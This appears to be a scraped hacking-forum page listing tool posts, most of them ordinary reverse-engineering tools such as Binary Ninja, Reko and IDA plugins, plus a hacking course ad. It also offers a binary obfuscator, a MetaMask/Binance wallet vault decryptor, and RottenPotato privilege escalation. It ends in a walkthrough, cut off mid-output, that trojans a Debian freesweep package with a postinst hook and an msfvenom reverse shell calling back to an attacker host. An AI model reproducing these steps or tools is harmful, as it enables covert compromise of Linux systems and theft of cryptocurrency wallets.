Search the Community

MSI Dump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner. On Macro-enabled Office documents we can quickly use oletools mraptor to determine whether document is malicious. If we want to dissect it further, we could bring in oletools olevba or oledump. To dissect malicious MSI files, so far we had only one, but reliable and trustworthy lessmsi. However, lessmsi doesn't implement features I was looking for: quick triage Binary data extraction YARA scanning Hence this is where msidump comes into play. Here we can see that input MSI is injected with suspicious VBScript and contains numerous executables in it. Now we want to take a closer look at this VBScript by extracting only that record. [Hidden Content]

Binary Ninja is an interactive decompiler, disassembler, debugger, and binary analysis platform built by reverse engineers, for reverse engineers. Developed with a focus on delivering a high-quality API for automation and a clean and usable GUI, Binary Ninja is in active use by malware analysts, vulnerability researchers, and software developers worldwide. Decompile software built for many common architectures on Windows, macOS, and Linux for a single price, or try out our limited (but free!) Cloud version. 3.3.3996 (2023-01-18) [Hidden Content] [hide][Hidden Content]]

Alcatraz is an x64 binary obfuscator that is able to obfuscate various different pe files including: .exe .dll .sys Features In the following showcase, all features (besides the one being showcased) are disabled. [hide][Hidden Content]]

Decryptor cold wallets data, from extension Metamask, Ronin, Binance, Brawe, etc. best decrypter via python, so fast work. Decrypt vault data from 0000.log file. Return mnemonic , derivation key, description Many options [Hidden Content]

Binary Ninja Commercial 3.2.3814 (2022-10-28) Binary Ninja is an interactive disassembler, decompiler, and binary analysis platform for reverse engineers, malware analysts, vulnerability researchers, and software developers that runs on Windows, macOS, and Linux. [Hidden Content] Stable Branch Changelog Note that customers with an active support license can access more frequent updates in the dev channel. This changelog only includes stable build milestones. 3.2.3814 (2022-10-28) Enhanced Windows Experience • Improved Enumerations • Next-Generation PDB Support • CFG Call Handling • MS Demangler Improvements Decompiler Improvements • Variable Merging/Splitting • Offset Pointers • Split Loads and Stores Objective-C Support Segments and Sections Editing UI Default to Clang Type Parser Named and Computer Licenses for Enterprise Documentation: • Vastly improved C++ API docs • New User Guide Layout UI Updates • Feature: Add “Restart and Reopen Files” command • Feature: “Run Script” Action and menu item • Feature: Add a recent file right-click menu for ‘Open with Options’ • Feature: Lots of new “magic” console variables • Feature: Add “Zoom to Fit” and “Zoom to Cursor” hotkeys • Feature: Add various filtering options to StringsView • Feature: Add ‘Copy’ options in the ‘Strings’ and ‘Symbols’ views • Feature: Restore window layout and location when reopening files • Feature: Show list of imported libraries in TriageView and if they have TypeLibrary information or not • Feature: Hotkeys for toggling integer size “D” and and sign “-“ in TypesView • Feature: Kill to end of line hotkey in python console • Feature: Undo/Redo now show action summaries for what will be done or undone • Feature: New Light Theme (Summer) • Improvement: Configurable HLIL tab width • Improvement: Move exact match to top of symbol list if found • Improvement: Hotkeys now searchable in the keybindings menu • Improvement: Wayland support (partial) • Improvement: Consistency of hotkeys in StackView (1, 2, 3) • Improvement: Menu organization (1, 2) • Improvement: Allow programmatically closing a global area widget • Improvement: “firstnavigate”, prefer triage, and other potentially conflicting default options normalized and documented • Fix: Text rendering glitch in hex view on Windows • Fix: Default font on Windows along with other font related improvements • Fix: Create structure ‘S’ hotkey wasn’t appearing to work during analysis • Fix: Right-click losing selection • Fix: BN hangs when it fails to open a URL • Fix: SettingsView filtering bug when pasting search text • Fix: ‘Display As’ for array index annotations • Fix: Various theme handling fixes (1, 2) • Fix: x86 assembler on Windows • Fix: Missing linear view updates when creating analysis objects via API Binary View Improvements • Improvement: PE more in-depth parsing of the LoadConfig structure • Improvement: PE create a symbol for the __security_cookie • Improvement: PE make DataVariables for XFG hashes • Improvement: PE identify _guard_check_icall and _guard_check_icall_check and their pointers • Improvement: PE Demangle GNU3 (clang) Mangled Names • Improvement: ELF Thumb2 entry point detection • Improvement: Mach-O Create DataVariables for ‘dylib’ and ‘dylib_command’ • Improvement: Mach-O Fix DYLIB and DYLD commands • Improvement: Mach-O Warn when encountering an unsupported INDIRECT_SYMBOL_LOCAL symbol • Fix: COFF loader does not respect address size when creating external symbols • Fix: COFF loader now recognizes (and stops loading) CIL and import library COFF files • Fix: PE Bug with parsing exception handlers • Fix: ELF hang when displaying DataVariables when section header count is too high Analysis • Feature: Added experimental option for keeping dead code branches • Feature: Setting to disable “pure” function call elimination • Feature: Add BinaryView metadata about which libraries have applied type information • Feature: Type extraction from mangled names is now optional • Feature: Recognition of thiscall and fastcall conventions on Win32 x86 • Improvement: Add support for indirect tailcall translation • Improvement: Improved string detection • Improvement: HLIL to other IL and assembly mappings • Improvement: Resolve dereferencing a structure into accessing the first member • Improvement: Create structure references for unknown field offsets • Improvement: Propagate pointer child type to dereference expression • Improvement: Template simplifier (from 2.3) now enabled by default • Improvement: Range clamping to improve jump table detection • Improvement: Add additional no-return function to Platform types • Fix: Issue where function analysis could timeout unintentionally • Fix: Invalid HLIL under some conditions • Fix: Missing empty cases in switch statements • Fix: HLIL graph when only default case falls through • Fix: Crash when wide string ends without null at section boundary • Fix: Fix hang in Pseudo C • Fix: Crash when importing function type info from unknown type • Fix: Constant propagation from writable memory for constant arrays • Fix: Properly decode and render strings with BOMs • Fix: Prevent demangler from making function types with single ‘void’ parameter • Fix: Don’t allow demangled types to override Platform types • Fix: MS Demangler fix order of multidimensional arrays • Fix: MS Demangler properly set calling convention • Fix: MS Demangler disambiguate int/long • Fix: MS Demangler add implicit ‘this’ pointer when demangling ‘thiscall’ • Fix: MS Demangler demangle SwiftCallingConvention API • New API: Merge and split variables • New API: Variable liveness API for determining soundness of merging/splitting variables • New API: Components class and notifications • New API: Get and set offset pointers • New API: Implement .tokens property on HLIL • New API: Function.get_variable_by_name • New API: Get and delete for DebugInfo API • New API: CallingConvention::GetVariablesForParameters • New API: BinaryView.get_default_load_settings • New API: Interaction.run_progress_dialog • New API: Function.is_thunk • New API: Notifications for Segment/Section Added/Updated/Removed • New API: Function.caller_sites • New API: HLIL_UNREACHABLE • New Example: Feature map • Improvement: Add progress callback to DebugInfo::ParseInfo • Improvement: Implement missing APIs in BinaryNinja::Metadata • Improvement: Add channel to core_version_info • Improvement: DebugInfo.parse_debug_info returns a boolean • Improvement: Many type hint additions and fixes • Improvement: Python/C++ APIs to get registers, register stacks, and flags for LLIL • Improvement: Allow DataVariable.name to be assigned a QualifiedName • Improvement: Added a significant amount of C++ API Documentation • Improvement: New theme for C++ documentation • Improvement: Allow passing QualifiedNameType instead of QualifiedName to many functions • Deprecation: BinaryViewTypeArchitectureConstant • Deprecation: BNLogRegisterLoggerCallback • Fix: Variable use/def API for aliased variables • Fix: Platform.os_list • Fix: DebugInfo.function • Fix: issue where EnumerationBuilder couldn’t set the width of the enumeration • Fix: BinaryView.get_functions_by_name to handle cases like sub_main • Fix: Trying to delete incomplete LowLevelILFunction • Fix: stack_adjustment.setter • Fix: Type annotation & documentation for define_auto_symbol_and_var_or_function • Fix: Issue where notification callbacks were not being called • Fix: missing debugger_imported definition in PythonScriptingInstance • Fix: Python exceptions when accessing functions with skipped IL analysis • Fix: Class hierarchy of HLILRet • Fix: Core parser not parsing struct __packed foo • Fix: Ignore UI plugins when loaded in headless Types • Fix: Make _Unwind_Resume() __noreturn Architectures • Armv7/Thumb2: Critical improvement to analysis of armv7/thumb2 call sites to respect callee function types • Armv7/Thumb2: Proper lifting for Thumb2 LDM and STR with Rn not included in register list • Armv7/Thumb2: Add lifting for SMULxx instruction forms • Armv7/Thumb2: Fix lifting of certain uses of flexible operands (Thank you @ehntoo) • Armv7/Thumb2: Fix crash on MSR banked instruction • Armv7/Thumb2: Fix PC-relative alignment issue • Armv7/Thumb2: Lift msr to basepri as __set_BASEPRI • Armv7/Thumb2: Added vmov immediate lifting (Thank you @ehntoo) • Armv7/Thumb2: Fix size of vstr storage (Thank you @ehntoo) • Arm64: Corrected lifting of *ZR target register • Arm64: Lifted load-acquire, store-release instructions • MIPS: Properly handle delay slot rewriting with call targets (Thank you @yrp) • MIPS: Lifted madd, maddu (Thank you @yrp) • x86/x86_64: int 0x29 now ends basic blocks Debugger • Feature: Add support for remote Windows/macOS/Linux debugging • Feature: Add basic support for iOS/Android remote debugging • Improvement: New breakpoint sidebar widget icon • Improvement: Remain in the debugger sidebar after launching the target or ending the debugging • Improvement: Register widget refactor • Improvement: Put the debugger breakpoints widget and registers widgets into a tab widget • Improvement: Modules widget refactor • Improvement: Status bar widget refactor • Improvement: Add history entries support for target console and debugger console • Fix: Windows x86 debugging • Fix: Invert debugger icon colors and fix panel icon to not be grayscale • Fix: Memory leak after using the debugger Plugins/Plugin Manager • Improvement: Prioritize plugin name in search filtering • Improvement: More robust against offline networks and captive portals • Improvement: Settings to allow disabling official and community plugin repositories Enterprise • Feature: Named and computer licenses are now available for Enterprise • Feature: Project files may now be stored in folders • Feature: The Enterprise server is now deployable with Docker Swarm • Feature: The Enterprise server is now deployable with custom SSL certificates • Improvement: Databases and files can now be downloaded directly from the files list without opening the database first • Improvement: Syncing has been made significantly faster by avoiding unnecessary analysis cache downloads • Improvement: A “skip” button has been added on initial launch to avoid waiting for server connection while offline • Improvement: Changed the way Enterprise server deployments work to allow additional flexibility and customization • Improvement: Enterprise client updates can now be downloaded and synced to the Enterprise server for only specific platforms • Fix: The initial login window now correctly responds to other ways to close a window (e.g. Cmd-Q) • Fix: Disabling plugins via the -p switch is now correctly supported in Enterprise • Fix: Fixed multiple client crashes related to UI and networking • Fix: The Enterprise server now correctly works with the compose sub-command included with newer versions of Docker [Hidden Content]

Become an expert and professional ethical hacker! Learn Network Security, Kali Linux, and other topics that nobody knows What you’ll learn Ethical Hacking Masterclass : From Zero to Binary Deep Fundamentals of Ethical Hacking Linux Permission Management Linux Network Manipulation Maltego Linux Software control Manage Linux Processes Linux Delete Files without traces Passive Information Gathering Requirements 4GB of RAM for Running VMWare and other programs Description *Printable online certificate available upon completion of course* Since the infancy of computers, hackers have been creatively solving problems. In the late 1950s, the MIT model railroad club was given a donation of parts, mostly old telephone equipment. The club’s members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing into the appropriate sections. They called this new and inventive use of telephone equipment hacking; many people consider this group to be the original hackers. The group moved on to programming on punch cards and ticker tape for early computers like the IBM 704 and the TX-0. While others were content with writing programs that just solved problems, the early hackers were obsessed with writing programs that solved problems well. A new program that could achieve the same result as an existing one but used fewer punch cards was considered better, even though it did the same thing. The key difference was how the program achieved its results—elegance. Hacker is a term for both those who write code and those who exploit it. Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. Since an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. Hacking is really just the act of finding a clever and counterintuitive solution to a problem. Program exploitation is a staple of hacking. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places. You can get started in white-hat ethical hacking using Kali Linux, and this course starts you on that road by giving you an overview of security trends, where you will learn about the OSI security architecture. This will form the foundation for the rest of Beginning Ethical Hacking with Kali Linux. With the theory out of the way, you’ll move on to an introduction to VirtualBox, VMWare, networking terminologies, and common Linux commands, followed by the step-by-step procedures to build your own web server and acquire the skill to be anonymous. When you have finished the examples in the first part, of course, you will have all you need to carry out safe and ethical hacking experiments. After an introduction to Kali Linux, you will carry out your first penetration tests with Python and code raw binary packets for use in those tests. You will learn how to find secret directories of a target system, how to use a TCP client in Python and services, and how to do port scanning using Nmap. Along the way, you will learn how to collect important information; how to track e-mail; and how to use important tools such as Dmitry, Maltego, and others. You’ll also take a look at the five phases of penetration testing. After that, this course will cover SQL mapping and vulnerability analysis where you will learn about sniffing and spoofing, why ARP poisoning is a threat, how SniffJoke prevents poisoning, how to analyze protocols with Wireshark, and how to use sniffing packets with Scapy. Then, you will learn how to detect SQL injection vulnerabilities, how to use Sqlmap, and how to do brute-force or password attacks. In addition, you will learn how to use important hacking tools such as OpenVas, Nikto, Vega, and Burp Suite. Who this course is for: Beginner Ethical Hackers who want to learn more [Hidden Content] [hide][Hidden Content]]

Binary Ninja is an interactive disassembler, decompiler, and binary analysis platform for reverse engineers, malware analysts, vulnerability researchers, and software developers that runs on Windows, macOS, Linux. Disassemble : Disassemble executables and libraries from multiple formats, platforms, and architectures. Decompile : Decompile code to C or BNIL for any supported architecture - including your own. Automate : Automate analysis with C++, Python, and Rust APIs from inside or outside the UI. Analyze : Visualize control flow and navigate through cross-references interactively. Annotate : Name variables and functions, apply types, create structres, and add comments. Collaborate : Collaborate effortlessly with synchronized commits using our Enterprise product. Disassemble Files Vector 35 provides first-party support for dissassembly from multiple architectures, including x86, x86-64, ARMv7 (with Thumb2), ARMv8 (AArch64), PowerPC, 6502, Z80, and MIPS. Additionally, our community supports many other architectures through our public plugin ecosystem. Loaders are available for all major platforms (PE, Mach-O, ELF) and can be extended or customized using our API. Decompile Code Our built-in decompiler works with all of our officially supported architectures at one price and builds on a powerful family of ILs called BNIL. In fact, not just our architectures, but even community architectures can produce amazing decompilation. Our decompiler outputs to both C and BNIL and can be switched on-demand. Automate Anything Our extensive API can be used to create and customize loaders, add or augment architectures, customize the UI, or automate any workflow (types, patches, decompilation…anything!). Bindings are available for C++, Python, and Rust. Create Plugins Made something cool and want to share? Publish your community plugin and have it featured in our Plugin Manager! These plugins can be installed (or updated) at any time by any customer, right inside the client. Triage Quickly Use our API to quickly batch process files and see the results in our triage view. Use the entropy graph to identify areas of interest, like packed or encrypted data. Click on any location to navigate there quickly. Explore Interactively We didn’t just build the best automation and API for binary analysis, but our UI design is intentional and clean. None of the distractions, but all of the features you need for the biggest jobs including multiple tabs, synchronized and split views, custom layouts and more. Annotate Everything Reverse engineering is the process of exploring the unknown. As your understanding improves, we give you the tools to represent that and improve analysis. Add types, structures, comments, highlights, tags, and more. Patch Effectively Make binary patches quickly and effectively with a variety of tools purpose-built for speed. Edit lines of assembly directly, select a preset patch, edit raw bytes with our hex editor view, or even compile C into the executable directly with our own built in compiler SCC. Switch Platforms You’ll never be stuck. Binary Ninja not only runs seamlessly on Windows, macOS, and Linux, but every purchases includes all three platforms for one price. Run Headlessly No need to only do your analysis inside of Binary Ninja. Instead, bring Binary Ninja into your analysis environment. Use the python repl of your choice, or even statically compile our core analysis library into an existing framework, our analysis can be completely untethered from the UI. Download : [Hidden Content]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. Changelog v0.11.1 This maintenance release provides minor enhancements and bugfixes, including: More ARM32 rewriters. More uses of generic IntrinsicProcedures. Replace recursive SccFinder with an non-recursive implementation. Initial support for Terse Executable format. Don’t try tracing into nonexecutable code. Ctrl+0 resets the zoom level of the Graph Viewer Many more PowerPC instructions supported C parser issues reported by @smx-smx Make SSA analysis use bit-accurate analysis for stack variables. Multithreaded robustness. It also has some refactorings and new classes, setting the stage for a future refactoring of the Scanner: New RtlSwitch subclass of RtlInstruction Support for platform-specific patterns for procedure entries. [hide][Hidden Content]]

Overview Patching assembly code to change the behavior of an existing program is not uncommon in malware analysis, software reverse engineering, and broader domains of security research. This project extends the popular IDA Pro disassembler to create a more robust interactive binary patching workflow designed for rapid iteration. This project is currently powered by a minor fork of the ubiquitous Keystone Engine, supporting x86/x64 and Arm/Arm64 patching with plans to enable the remaining Keystone architectures in a future release. Special thanks to Hex-Rays for supporting the development of this plugin. [hide][Hidden Content]]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. [hide][Hidden Content]]

RevPTC, a professional Multilevel Marketing Solution that comes with pay per click (PPC) system. It’s developed for those people who want to start their Multilevel business website with additional PTC features. globally, 60 million people work as network marketers & 36.6 million customers have bought products/services from the network marketing model. It’s an industry and here today we keep our footprint on this industry with our RevPTC, a complete solution for multilevel marketing business. here, marketers and users can join via referral system, by using upline username, can manage their downline, able to choose plans, earn referral commissions, withdraw their earning, earn by clicking ads and more. [Hidden Content] [hide][Hidden Content]]

New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools. RottenPotatoDLL This project generates a DLL and EXE file. The DLL contains all the code necessary to perform the RottenPotato attack and get a handle to a privileged token. The MSFRottenPotatoTestHarness project simply shows example usage for the DLL. For more examples, see [Hidden Content], specifically the SeAssignPrimaryTokenPrivilege.cpp and SeImpersonatePrivilege.cpp files. RottenPotatoEXE This project is identical to the above, except the code is all wrapped into a single project/binary. This may be more useful for some penetration testing scenarios. Modify the "main" method in MSFRottenPotato.cpp to change what command will be run. By default it just runs cmd.exe to pop a command shell. [hide][Hidden Content]]

IDA2Obj is a tool to implement SBI (Static Binary Instrumentation). The working flow is simple: Dump object files (COFF) directly from one executable binary. Link the object files into a new binary, almost the same as the old one. During the dumping process, you can insert any data/code at any location. SBI is just one of the using scenarios, especially useful for black-box fuzzing. [hide][Hidden Content]]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. Changelog v0.10.1 This maintenance release moves Reko from .NET Core 3.1 to .NET 5.0, resulting in some performance gains. It also fixes the MSI installers for Windows, which had several issues (including #1066 and #1067). Special thanks to @smx-smx for his work on his CI integration work. The Reko build system now assumes C# 9.0 Crude support for #define directives in the Reko C parser Overhaul of PA-RISC and HP SOM loader The command line driver --version switch displays the git hash used to build the binary. Improvements in AArch64 disassembler and rewriter (with @rfalke as a driving force) [hide][Hidden Content]]

FindYara Use this IDA python plugin to scan your binary with Yara rules. All the Yara rule matches will be listed with their offset so you can quickly hop to them! Using FindYara The plugin can be launched from the menu using Edit->Plugins->FindYara or using the hot-key combination Ctrl-Alt-Y. When launched the FindYara will open a file selection dialogue that allows you to select your Yara rules file. Once the rule file has been selected FindYara will scan the loaded binary for rule matches. All rule matches are displayed in a selection box that allows you to double click the matches and jump to their location in the binary. [hide][Hidden Content]]

Karta - source code assisted fast binary matching plugin for IDA. [hide][Hidden Content]]

Reko (Swedish: "decent, obliging") is a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and a ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. [hide][Hidden Content]]

Become an expert and professional ethical hacker ! Learn Network Security, Kali Linux and other topics that nobody knows What you'll learn Fundamentals of Ethical Hacking Linux Permission Management Linux Network Manipulation Maltego Linux Software control Manage Linux Processes Linux Delete Files without traces Passive Infromation Gathering Requirements 4GB of RAM for Running VMWare and other programs Description *Printable online certificate available upon completion of course* Since the infancy of computers, hackers have been creatively solving problems. In the late 1950s, the MIT model railroad club was given a donation of parts, mostly old telephone equipment. The club’s members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing in to the appropriate sections. They called this new and inventive use of telephone equipment hacking; many people consider this group to be the original hackers. The group moved on to programming on punch cards and ticker tape for early computers like the IBM 704 and the TX-0. While others were content with writing programs that just solved problems, the early hackers were obsessed with writing programs that solved problems well. A new program that could achieve the same result as an existing one but used fewer punch cards was considered better, even though it did the same thing. The key difference was how the program achieved its results—elegance. Hacker is a term for both those who write code and those who exploit it. Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. Since an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. There are interesting hacks found in both the techniques used to write elegant code and the techniques used to exploit programs. Hacking is really just the act of finding a clever and counterintuitive solution to a problem. Program exploitation is a staple of hacking. As demonstrated in the previous in this course, a program is made up of a complex set of rules following a certain execution flow that ultimately tells the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Since a program can really only do what it’s designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places. You can get started in white-hat ethical hacking using Kali Linux, and this course starts you on that road by giving you an overview of security trends, where you will learn about the OSI security architecture. This will form the foundation for the rest of Beginning Ethical Hacking with Kali Linux. With the theory out of the way, you’ll move on to an introduction to VirtualBox, VMWare, networking terminologies, and common Linux commands, followed by the step-by-step procedures to build your own web server and acquire the skill to be anonymous. When you have finished the examples in the first part of course, you will have all you need to carry out safe and ethical hacking experiments. After an introduction to Kali Linux, you will carry out your first penetration tests with Python and code raw binary packets for use in those tests. You will learn how to find secret directories of a target system, how to use a TCP client in Python and services, and how to do port scanning using Nmap. Along the way, you will learn how to collect important information; how to track e-mail; and how to use important tools such as DMitry, Maltego, and others. You’ll also take a look at the five phases of penetration testing. After that, this course will cover SQL mapping and vulnerability analysis where you will learn about sniffing and spoofing, why ARP poisoning is a threat, how SniffJoke prevents poisoning, how to analyze protocols with Wireshark, and how to use sniffing packets with Scapy. Then, you will learn how to detect SQL injection vulnerabilities, how to use Sqlmap, and how to do brute-force or password attacks. In addition, you will learn how to use important hacking tools such as OpenVas, Nikto, Vega, and Burp Suite. Who this course is for: Beginner Ethical Hackers who wants to learn more [Hidden Content] [hide][Hidden Content]]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Reko consists of a central .NET assembly Reko.Decompiler.dll which contains the central core logic. Leaving aside the user interface for a moment, the Reko can at a glance be considered a pipeline. The first stage of the pipeline loads the executable we wish to decompile. Later stages perform different kinds of analyses, extracting information from the machine language where they can and aggregating it into structured information (such as Procedures and data types). The final stage is the output stage, where the source code is emitted into files. A central tenet is that Reko is extensible: wherever possible, we strive to avoid hard-coding knowledge about specific platforms, processors, or file formats in the core decompiler. Instead, such special knowledge is farmed out in separate assemblies. Examples: Reko.Arch.X86.dll – provides support for disassembling Intel X86 binaries. Reko.ImageLoaders.MzExe.dll – understands how to load MS-DOS executable files and all related formats Reko.ImageLoaders.Elf.dll – understands the ELF executable file format. Changelog v0.9.3 This is the last time Reko is released for .NET Framework and Mono. Future releases will be based on .NET Core and .NET 5 The release consists of minor feature enhancements and bug fixes. Initial support for IA-64 and v850 support Support for the MIL-STD-1750, XCore-200, CompactRisc, MCore and Hexagon architectures Rewrite Reko’s MemoryArea abstraction to support non-byte-oriented archictectures (like Cray YMP and MIL-STD-1750) As usual, more x86 rewriters (with thanks to @smx-smx) Improved Sparc, zSeries, and Risc-V disassemblers Fuse adjacent memory accesses x86 and GUI support for specifying separate architecture models. Unpacker script for Exepack 3.60 et al. Loader for preprocessed C headers, making it possible to use such headers as metafiles in Reko projects (with thanks to @ptomin) User-supplied labels (#987) Register Values dialog (#950) Support for the TekHex and LDM text file formats Support for Unicos binary executables. Support for PharLap DOS Extender executables (with thanks to @gbody) [hide][Hidden Content]]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Reko consists of a central .NET assembly Reko.Decompiler.dll which contains the central core logic. Leaving aside the user interface for a moment, the Reko can at a glance be considered a pipeline. The first stage of the pipeline loads the executable we wish to decompile. Later stages perform different kinds of analyses, extracting information from the machine language where they can and aggregating it into structured information (such as Procedures and data types). The final stage is the output stage, where the source code is emitted into files. [hide][Hidden Content]]

Binary Ninja assistant plugin for vulnerability research. Description: This plugin aims to assist during the vulnerability research process by providing a full tracing of sources of parameters to selected functions. It also provides a scanning capability which uses the function tracer and applies several rules to detect potentially dangerous function calls. Author: Martin Petran Scanner is using set of rules and function tracker to perform basic analysis to detect any potentially vulnerable function calls. Issues that are found by this component are marked with tags that reflect the priority for a follow-up manual analysis. Following are the priority categories: 🔴 High - Detected conditions are likely to lead to vulnerability. 🟠 Medium - Detected conditions could theoretically lead to vulnerability. 🟡 Low - Detected conditions are unlikely to lead to vulnerability. 🔵 Info - Detected conditions were not clear enough to determine if the call is secure or not. [hide][Hidden Content]]

Features The binary multi-tool and reversing platform All Reverse Engineering API Powerful Editing Performance Hex Editor [Hidden Content] Demo: [Hidden Content] [HIDE][Hidden Content]]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Changelog v0.9.1 This is a minor release, but with a lot of new small features and fixes. A noteworthy new feature is Reko’s ability to automatically place decompiled procedures into different files, based on a OutputFilePolicy. An OutputFilePolicy decides into which files procedures should go, based on criteria like segment name, address offset within a segment etc. Future work will allow users to customize the placements on a per-procedure basis. The project has partially completed moving .csproj files to the new .NET SDK format (issue #748). Most files are now building to the netstandard2.0 target framework. Progress is stalled due to the complex Reko build process. If you’re interested in helping us get ready for .NET 5, contact the Reko team at [Hidden Content]. Initial support was added for the following CPU instruction set architectures: Motorola 6809 WE32100 LatticeMico32 ARC, ARCompact Mips16e Other noteworthy new features include: Support for 16-bit OS/2 executables (with thanks to @claunia) Introduced rudimentary LE/LX executable support (with thanks to @claunia) Introduced support for Nintendo Switch (with thanks to @smx-smx) Enhancements to Xbox370 XEX executable loader (with thanks to @smx-smx) Apply relocations to MacOS classic A5 world (with thanks to @gbody) Implement finding ASCII and UTF-8 strings (with thanks to @ermshiperete) Stability and bug fixes in SSA transform (with thanks to @ptomin) Introduced 6502 emulator for handling C64 unpackers. Introduced support for CodeView debugging information. Introduced support for Commoder 64 T64 file format and MorphOS binaries. Introduced OMF library loader New AssembleAt method will allow patching of code with assembler language Handle Windows VxD dynamic linking fixups Fixes to i8051, ARM, M68k, PowerPC, X86 disassemblers and rewriters Changes to the C parser to handle Microsoft and IBM-specific extensions (__far, __near, __pascal, etc) Support for Microsoft Binary Format (5-byte floating point numbers) Generalized OllyDbg support to handle non-x86 architectures. [HIDE][Hidden Content]]

Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Reko consists of a central .NET assembly Reko.Decompiler.dll which contains the central core logic. Leaving aside the user interface for a moment, the Reko can at a glance be considered a pipeline. The first stage of the pipeline loads the executable we wish to decompile. Later stages perform different kinds of analyses, extracting information from the machine language where they can and aggregating it into structured information (such as Procedures and data types). The final stage is the output stage, where the source code is emitted into files. A central tenet is that Reko is extensible: wherever possible, we strive to avoid hard-coding knowledge about specific platforms, processors, or file formats in the core decompiler. Instead, such special knowledge is farmed out in separate assemblies. Examples: Reko.Arch.X86.dll – provides support for disassembling Intel X86 binaries. Reko.ImageLoaders.MzExe.dll – understands how to load MS-DOS executable files and all related formats Reko.ImageLoaders.Elf.dll – understands the ELF executable file format. [HIDE][Hidden Content]]

In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper. root@kali:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... root@kali:~# mkdir /tmp/evil root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil root@kali:~# cd /tmp/evil/ root@kali:/tmp/evil# Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”. root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work root@kali:/tmp/evil# mkdir work/DEBIAN In the DEBIAN directory, create a file named control that contains the following: root@kali:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. We also need to create a post-installation script that will execute our binary. In our DEBIAN directory, we’ll create a file named postinst that contains the following: root@kali:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & Now we’ll create our malicious payload. We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’. root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Saved as: 